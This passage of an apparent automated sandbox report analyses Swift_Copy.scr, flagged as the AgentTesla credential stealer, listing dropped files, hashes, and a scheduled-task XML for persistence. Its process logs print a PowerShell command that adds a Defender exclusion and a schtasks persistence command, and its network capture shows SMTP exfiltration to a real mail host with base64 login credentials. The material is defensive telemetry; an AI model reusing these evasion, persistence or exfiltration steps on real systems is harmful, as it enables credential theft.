PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.378486415808052
                          Encrypted:false
                          SSDEEP:48:fWSU4y4RFymFoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHyIFvKLgZ2KRHWLOug8s
                          MD5:8702CDF7B229DD465C49606EE859BBB5
                          SHA1:F25F3BC8D5BD1DB1455D2EB3B5A9A254A6F8AEDA
                          SHA-256:3090B8AE8E09FFD3DA747CF1B80DEC6C69023D11ECC710B3FAD2C5CA412DBEC3
                          SHA-512:057E9A76121613A3F8CCD475F8880F17939A444526D3DCD23416AB0E0AAC623FAD9704443D834462E036914A944E1D3105412A357F87888E3F46CD11FBBBE5A4
                          Malicious:false
                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1583
                          Entropy (8bit):5.103033954025875
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiv
                          MD5:7A45F95E7BDC31A16D55C37EB1FF32D6
                          SHA1:A45AC8F18727D46EBEF864A7AE59A9803B7DC365
                          SHA-256:6EF7864A8503F7B7223C78916F3AE7CF2B3439EEFFBC021773FFE8EC51878BD8
                          SHA-512:1241CC512D90061A3F3CB95468B4D6CDFEBD682455C210721F0F964805FEFE5EA1572B891EC66AE4E9B8CA14B48B96988122D90ACB3FE10ADB35DEAE5AF74243
                          Malicious:true
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                          Process:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1583
                          Entropy (8bit):5.103033954025875
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiv
                          MD5:7A45F95E7BDC31A16D55C37EB1FF32D6
                          SHA1:A45AC8F18727D46EBEF864A7AE59A9803B7DC365
                          SHA-256:6EF7864A8503F7B7223C78916F3AE7CF2B3439EEFFBC021773FFE8EC51878BD8
                          SHA-512:1241CC512D90061A3F3CB95468B4D6CDFEBD682455C210721F0F964805FEFE5EA1572B891EC66AE4E9B8CA14B48B96988122D90ACB3FE10ADB35DEAE5AF74243
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):736776
                          Entropy (8bit):7.867689633707492
                          Encrypted:false
                          SSDEEP:12288:RHyraUHvmSOjnNhxga6rA/zejc1KGaEPMcUf1woPwo8ncQGknucdM3faVgkR:dCLWnjPGZyxUdwoPSncbknuKiaH
                          MD5:A474CCDA551682DCB92EFE1402DD02CB
                          SHA1:6A147A094A142D0DDF04C97B6B74626BE611C189
                          SHA-256:1680D6FF15E6C5B4A4098B88073646BB4CFF58B6C51A916BED32401B02A64A6B
                          SHA-512:656FC590D3B354FDF389DFA9B858A1C9A52D787DE3C3644735862CCAAB163F9FBB925E03C8721277FC6A33594DC6280B0230AE0823972149774755010EA61BBD
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 71%
                          • Antivirus: Virustotal, Detection: 45%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&f................................. ........@.. .......................`............@.................................p...K.... ...................6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........q...........................................................0..A....... :........%....(......... .........%.u...(.....v...(....*.....&*....0..V........(.......r...p}.....r...p}....+..r...p}.....r...p}..... ....}.....r...p}....+...}....*...0..B........(........}......}....+...}.......}.......}.......}....+....}....*...0............{......*..&...}....*...0............{......*..&...}....*...0............{......*..&...}....*...0............{......*..&...}....*...0..
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.867689633707492
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          • Win32 Executable (generic) a (10002005/4) 49.96%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:Swift_Copy.scr
                          File size:736'776 bytes
                          MD5:a474ccda551682dcb92efe1402dd02cb
                          SHA1:6a147a094a142d0ddf04c97b6b74626be611c189
                          SHA256:1680d6ff15e6c5b4a4098b88073646bb4cff58b6c51a916bed32401b02a64a6b
                          SHA512:656fc590d3b354fdf389dfa9b858a1c9a52d787de3c3644735862ccaab163f9fbb925e03c8721277fc6a33594dc6280b0230ae0823972149774755010ea61bbd
                          SSDEEP:12288:RHyraUHvmSOjnNhxga6rA/zejc1KGaEPMcUf1woPwo8ncQGknucdM3faVgkR:dCLWnjPGZyxUdwoPSncbknuKiaH
                          TLSH:FBF412086ABBBF4BDABD47B11561CD1453F2B06A5232D3070FC760EA2DA1FD48A91B53
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&f................................. ........@.. .......................`............@................................
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x4b1bbe
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6626108D [Mon Apr 22 07:23:57 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Signature Valid:false
                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                          Subject Chain
                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                          Version:3
                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                          Serial:7C1118CBBADC95DA3752C46E47A27438
                          Instruction
                          jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 97 times: the decoding of the 00 00 byte pairs that follow the jmp)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb1b70 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x800 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb0800 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xafbc4 | 0xafc00 | e9ca07bb2e2e57b63cecbaf2762ebfdf | False | 0.9273037428876245 | data | 7.876501523545841 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb2000 | 0x800 | 0x800 | 1717871d4213b08a5747ffe539d823e1 | False | 0.33447265625 | data | 3.4172960973451905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb4000 | 0xc | 0x200 | c3b595daa9f1dedb03d3995f9f3ccf68 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name         RVA      Size   Language  Country  ZLIB Complexity     Type
                          RT_VERSION   0xb2090  0x380                     0.4296875           data
                          RT_MANIFEST  0xb2420  0x1ea                     0.5489795918367347  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                          DLL          Import
                          mscoree.dll  _CorExeMain
                          Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                          Apr 23, 2024 10:19:48.129008055 CEST  49709        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:48.344245911 CEST  587          49709      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:48.344329119 CEST  49709        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:48.700604916 CEST  587          49709      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:48.707277060 CEST  49709        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:48.922532082 CEST  587          49709      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:48.923542023 CEST  49709        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:49.139166117 CEST  587          49709      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:49.183999062 CEST  49709        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:49.945338011 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:50.161073923 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:50.161299944 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:50.338242054 CEST  49709        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:50.452187061 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:50.452433109 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:50.667149067 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:50.667454004 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:50.923896074 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:54.883424044 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:54.933583975 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:55.808036089 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:56.022960901 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:56.030271053 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:56.030833006 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:56.245582104 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:56.245841980 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:56.462100029 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:56.469531059 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:56.684170961 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:56.684262991 CEST  49711        587        192.168.2.5  65.21.71.87
                          Apr 23, 2024 10:19:56.684662104 CEST  587          49711      65.21.71.87  192.168.2.5
                          Apr 23, 2024 10:19:56.684708118 CEST  49711        587        192.168.2.5  65.21.71.87
                          Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                          Apr 23, 2024 10:19:47.672755957 CEST  63401        53         192.168.2.5  1.1.1.1
                          Apr 23, 2024 10:19:48.120584965 CEST  53           63401      1.1.1.1      192.168.2.5
                          Timestamp                             Source IP    Dest IP      Trans ID  OP Code             Name                    Type            Class        DNS over HTTPS
                          Apr 23, 2024 10:19:47.672755957 CEST  192.168.2.5  1.1.1.1      0x5592    Standard query (0)  mail.sigmamotorspk.com  A (IP address)  IN (0x0001)  false
                          Timestamp                             Source IP    Dest IP      Trans ID  Reply Code    Name                    CName              Address      Type                    Class        DNS over HTTPS
                          Apr 23, 2024 10:19:48.120584965 CEST  1.1.1.1      192.168.2.5  0x5592    No error (0)  mail.sigmamotorspk.com  sigmamotorspk.com               CNAME (Canonical name)  IN (0x0001)  false
                          Apr 23, 2024 10:19:48.120584965 CEST  1.1.1.1      192.168.2.5  0x5592    No error (0)  sigmamotorspk.com                          65.21.71.87  A (IP address)          IN (0x0001)  false
                          Timestamp                             Source Port  Dest Port  Source IP    Dest IP      Commands
                          Apr 23, 2024 10:19:48.700604916 CEST  587          49709      65.21.71.87  192.168.2.5  220-pcp6.mywebsitebox.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 13:19:47 +0500
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                          Apr 23, 2024 10:19:48.707277060 CEST  49709        587        192.168.2.5  65.21.71.87  EHLO 585948
                          Apr 23, 2024 10:19:48.922532082 CEST  587          49709      65.21.71.87  192.168.2.5  250-pcp6.mywebsitebox.com Hello 585948 [89.187.171.132]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                          Apr 23, 2024 10:19:48.923542023 CEST  49709        587        192.168.2.5  65.21.71.87  AUTH login a2hpcm9Ac2lnbWFtb3RvcnNway5jb20=
                          Apr 23, 2024 10:19:49.139166117 CEST  587          49709      65.21.71.87  192.168.2.5  334 UGFzc3dvcmQ6
                          Apr 23, 2024 10:19:50.452187061 CEST  587          49711      65.21.71.87  192.168.2.5  220-pcp6.mywebsitebox.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 13:19:49 +0500
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                          Apr 23, 2024 10:19:50.452433109 CEST  49711        587        192.168.2.5  65.21.71.87  EHLO 585948
                          Apr 23, 2024 10:19:50.667149067 CEST  587          49711      65.21.71.87  192.168.2.5  250-pcp6.mywebsitebox.com Hello 585948 [89.187.171.132]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                          Apr 23, 2024 10:19:50.667454004 CEST  49711        587        192.168.2.5  65.21.71.87  AUTH login a2hpcm9Ac2lnbWFtb3RvcnNway5jb20=
                          Apr 23, 2024 10:19:54.883424044 CEST  587          49711      65.21.71.87  192.168.2.5  334 UGFzc3dvcmQ6
                          Apr 23, 2024 10:19:56.030271053 CEST  587          49711      65.21.71.87  192.168.2.5  235 Authentication succeeded
                          Apr 23, 2024 10:19:56.030833006 CEST  49711        587        192.168.2.5  65.21.71.87  MAIL FROM:<khiro@sigmamotorspk.com>
                          Apr 23, 2024 10:19:56.245582104 CEST  587          49711      65.21.71.87  192.168.2.5  250 OK
                          Apr 23, 2024 10:19:56.245841980 CEST  49711        587        192.168.2.5  65.21.71.87  RCPT TO:<maungth@b-mech.com.sg>
                          Apr 23, 2024 10:19:56.462100029 CEST  587          49711      65.21.71.87  192.168.2.5  550 Outgoing mail from "khiro@sigmamotorspk.com" has been suspended.
                          Apr 23, 2024 10:19:56.684170961 CEST  587          49711      65.21.71.87  192.168.2.5  421 pcp6.mywebsitebox.com lost input connection

                          Target ID:0
                          Start time:10:19:38
                          Start date:23/04/2024
                          Path:C:\Users\user\Desktop\Swift_Copy.scr
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Swift_Copy.scr" /S
                          Imagebase:0xfd0000
                          File size:736'776 bytes
                          MD5 hash:A474CCDA551682DCB92EFE1402DD02CB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:10:19:43
                          Start date:23/04/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"
                          Imagebase:0x9f0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:10:19:43
                          Start date:23/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"
                          Imagebase:0x190000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:10:19:44
                          Start date:23/04/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0x5d0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
